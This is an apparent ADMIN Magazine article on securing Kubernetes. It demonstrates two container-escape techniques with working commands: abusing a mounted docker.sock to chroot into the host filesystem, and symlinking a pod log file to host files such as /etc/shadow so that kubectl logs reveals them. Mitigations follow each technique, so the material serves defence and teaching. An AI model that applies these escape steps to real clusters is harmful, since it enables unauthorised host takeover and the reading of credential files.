Securing the container environment

Escape Room

The Infamous sock File

The Docker daemon can listen for requests over three types of sockets: unix, tcp, and fd. By default, a socket is created at /var/run/docker.sock, but for other container runtimes (e.g., containerd or CRIO), it could be created at /run/containerd/containerd.sock or /run/crio/crio.sock.

Applications may use the Docker and containerd daemon from the host to interact with containers, because they lack their own runtime, especially for security tools, monitoring services, and service meshes that need to ask the sock to gather some information from containers installed in the cluster. One good example would be a security runtime protection tool that needs control over all containers.

Different or equivalent .sock files, when mounted inside a container, allow some interactions with the container runtime installed on the host. An attacker could run commands on any containers within the cluster, which would somehow allow for full control of the host.

To illustrate an attacker technique, look at the pod manifest file in Listing 4 that mounts the folder /var/run/docker.sock from the host. To deploy it on your cluster, run

kubectl apply -f <file_name>.yaml

Listing 4

Pod Manifest File

apiVersion: v1
kind: Pod
metadata:
  name: docker-socket-pod
spec:
  containers:
  - name: docker-socket-container
    image: nginx
    volumeMounts:
    - name: docker-socket-volume
      mountPath: /var/run/docker.sock
  volumes:
  - name: docker-socket-volume
    hostPath:
      path: /var/run/docker.sock

Now that the pod is running successfully on the cluster, get into the container shell by running

kubectl exec -it docker-socket-pod -- /bin/bash

To leverage the docker.sock file, run

df -h | grep sock

to show that the mounted folder is present on the container. Assuming your NGINX container does not come with Docker pre-installed, go ahead and install it:

apt update && apt install wget
wget https://download.docker.com/linux/static/stable/x86_64/docker-18.09.0.tgz
tar -xvf docker-18.09.0.tgz
cd docker
cp docker /usr/bin

Now, interact directly with the Docker daemon on the host and get a list of all Docker containers to obtain information or show available images, by running one of these commands:

docker -H unix:///var/run/docker.sock ps -a
docker -H unix:///var/run/docker.sock info
docker -H unix:///var/run/docker.sock images

Finally, the attack goal is closer, and you are going to escape to the host by creating a privileged Docker container that mounts the root filesystem (/) into the container /abc folder and chroot into it by running the following command on a container:

docker -H unix:///var/run/docker.sockrun --rm -it-v /:/abc:ro debian chroot /abc

You can now list all the files on the root filesystem and execute some useful commands to interact with the pods running on the node.

Note that the cluster is using containerd as the runtime, so you can run commands with crictl [8] instead of the docker command. The command in Listing 5 lists all containers on that particular node.

Listing 5

crictl Output

crictl --runtime-endpoint unix:///run/containerd/containerd.sock ps
CONTAINER        IMAGE             CREATED             STATE        NAME                      ATTEMPT       POD ID              POD
61eee33898c09    92b11f67642b6     About an hour ago   Running      docker-socket-container   0             16ee465d1120a       docker-socket-pod
38e1eb8945613    5e785d005ccc1     2 hours ago         Running      calico-kube-controllers   334           897bae6c4ca20       calico-kube-controllers-57b57c56f-2xmwl
8cc45d79ecb85    550e0029f6bd4     2 months ago        Running      health-check              0             0f1650dc41993       health-check-deployment-5b797c6cdf-kz62z
bbd1338aa1798    b8973f272a0a1     2 months ago        Running      build-code                0             3c60d6053a26a       build-code-deployment-68dd47875-85tb8
1c059432e17bc    8a648053c00f5     2 months ago        Running      hunger-check              0             56218b2e56fa8       hunger-check-deployment-96b6764f9-7zsbk
cbdd56829a054    0ff4eace8cd5b     2 months ago        Running      metadata-db               0             cfb1532ab1843       metadata-db-648b64948f-ttzlk
129d03711f19b    aa2bf2205b2c2     2 months ago        Running      cache-store               0             0257aafa379c4       cache-store-deployment-7cb76b5448-gwzfb
72f7a1082f276    f84e0146849d0     7 months ago        Running      enforcer                  1             a7c5003dc61ef       asset-mgmt-admission-enforcer-77bc7f9c77-mq28g
1760ed98e261a    2d6c7c11d7191     7 months ago        Running      agent                     1             6f7fc69a30e2b       asset-mgmt-inventory-agent-ff65ddd6d-k4rf5
60ce1262e18c2    5185b96f0becf     7 months ago        Running      coredns                   1             352e98cc2db8b       coredns-787d4945fb-rc8gk
fb734ad33071f    5185b96f0becf     7 months ago        Running      coredns                   1             bdbfdbf700263       coredns-787d4945fb-97lt4
a29cad83da33b    153f0442d7cc2     7 months ago        Running      daemon                    1             5c9045f016c33       asset-mgmt-runtime-daemon-vfsrj
edb4568bd80eb    08616d26b8e74     7 months ago        Running      calico-node               1             c6aba3d4b683e       calico-node-92zq7
c55945531ebc7    a7f25b1a3cf06     7 months ago        Running      shim                      1             1ba186d5b2f2b       asset-mgmt-imagescan-daemon-g2z79
c99bb749678ce    b6329daf3154a     7 months ago        Running      daemon                    1             1ba186d5b2f2b       asset-mgmt-imagescan-daemon-g2z79
93e070773470e    89da1fb6dcb96     7 months ago        Running      redis-containers          1             ddcb53268c97c       redis
6ff7458fd798c    f592e34f70efc     7 months ago        Running      daemon                    1             718dc88d509dd       asset-mgmt-flowlogs-daemon-td5hc
1393c8bdc62ff    92ed2bec97a63     7 months ago        Running      kube-proxy                1             5bf2de2a3af3c       kube-proxy-b65c9

The mitigations for the above technique could be used to ensure that no containers mount docker.sock as a volume. Of course, that is easy to say, but what if you have requirements and use cases that need to mount that socket, as in the case of a container to troubleshoot an issue, a security tool that needs access to the host, or some other reason? In these cases, you should protect the privileged pods, have some monitoring and alerting in place, and segregate the network to allow only specific resources to communicate with the pods.

Escaping to Host by Creating a Symbolic Link

This time, you will have a pod running as root with a mountpoint to the node's /var/log directory. This configuration setting may be seen as innocent, but it holds profound implications that can expose the entire content of its host filesystem to any user who has access to its logs.

Within nodes and control planes, a structured directory exists within the /var/log/pods directory. This directory contains the 0.log file (Figure 4). Consider a scenario in which a pod is configured with a hostPath volume mount to /var/log, which would mean that the pod has access to all pod logfiles on that host. By adding a symlink from the container's 0.log file to, for instance, /etc/shadow or any other sensitive file on the host, you can access the file by running

cat /var/log/pod/<name_of_pod>/0.log
Figure 4: /var/log/pod file structure and 0.log files from mounted container hostPath volume.

From the container, browse to the directory where the 0.log files are and create a symlink (which could be any needed file from the node):

ln -sf /etc/hostname 0.log

On the host, fetch the logs for the specific container pod,

kubectl logs checkpoint_asset-mgmt-<xxxx> -n <namespace>

and you get the failed to get parse function: unsupported log format: "checkpoint\n" error showing the hostname from file /etc/hostname. You just got the host file content from the error. If you use one of these use cases to mount the /var/log folder, be aware that your deployment will become vulnerable to this host takeover technique.

Several remediations and mitigations can be used to prevent such vulnerabilities. Always try, whenever possible, to avoid containers running as root and deploy some guardrails by implementing admission controllers with policies designed to prevent root access or to authorize specific images for which root is a requirement and have them under control.

Another course of action is simply not to deploy pods with a writeable hostPath to /var/log. Much better would be to set it up as read-only.

Conclusion

Protecting your data needs to be a priority for your business. Always use the least privilege principle when running your workloads. Never underestimate your adversaries, because most hackers target businesses indiscriminately and will compromise your infrastructure. Attackers dedicate a lot of hours in a day to work diligently toward their goals and objectives. The escape techniques discussed in this article should serve as an example of how your assets could be at risk.

The Author

Raul Lapaz works as a Cloud and Kubernetes security engineer at the Swiss pharmaceutical company Roche, with more than 25 years of experience in the IT world. His primary role is to design, implement, and deploy a secure cloud and container environment for health care digital products in AWS. He is very passionate about his work and loves to write technical articles for magazines in his free time.

Buy this article as PDF

Express-Checkout as PDF
Price $2.95
(incl. VAT)

Buy ADMIN Magazine

SINGLE ISSUES
 
SUBSCRIPTIONS
 
TABLET & SMARTPHONE APPS
Get it on Google Play

US / Canada

Get it on Google Play

UK / Australia

Related content

comments powered by Disqus
Subscribe to our ADMIN Newsletters
Subscribe to our Linux Newsletters
Find Linux and Open Source Jobs



Support Our Work

ADMIN content is made possible with support from readers like you. Please consider contributing when you've found an article to be beneficial.

Learn More”>
	</a>

<hr>		    
			</div>
		    		</div>

		<div class=